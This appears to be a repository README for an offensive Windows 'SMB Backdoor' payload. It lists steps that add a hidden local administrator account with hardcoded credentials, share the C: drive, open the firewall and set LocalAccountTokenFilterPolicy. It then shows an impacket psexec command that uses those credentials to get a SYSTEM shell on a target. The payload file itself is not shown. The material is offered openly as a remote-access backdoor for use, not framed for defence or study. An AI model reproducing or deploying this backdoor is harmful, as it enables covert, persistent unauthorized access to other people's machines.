7d4a6ebf55
1) Adds a user account (RD_User:RD_P@ssW0rD). 2) Adds this local user to local administrator group. 3) Shares "C:" directory (RD_SHARE). 4) Adds a rule to the firewall. 5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account. 6) Hides this user account. |
||
---|---|---|
.. | ||
README.md | ||
payload.txt |
README.md
"Microsoft Windows" SMB Backdoor
- Title: "Microsoft Windows" SMB Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
Description
- Adds a user account (RD_User:RD_P@ssW0rD).
- Adds this local user to local administrator group.
- Shares "C:" directory (RD_SHARE).
- Adds a rule to the firewall.
- Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
- Hides this user account.
Exploitation
The connection identifiers will be those defined by the values : RD_User and RD_P@ssW0rD.
hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./RD_User:RD_P@ssW0rD@<TARGET>
C:\WINDOWS\system32> whoami
nt authority\system
The connection identifiers and the share name will be those defined by the values : RD_SHARE, RD_User and RD_P@ssW0rD.
smb://<TARGET>/RD_SHARE/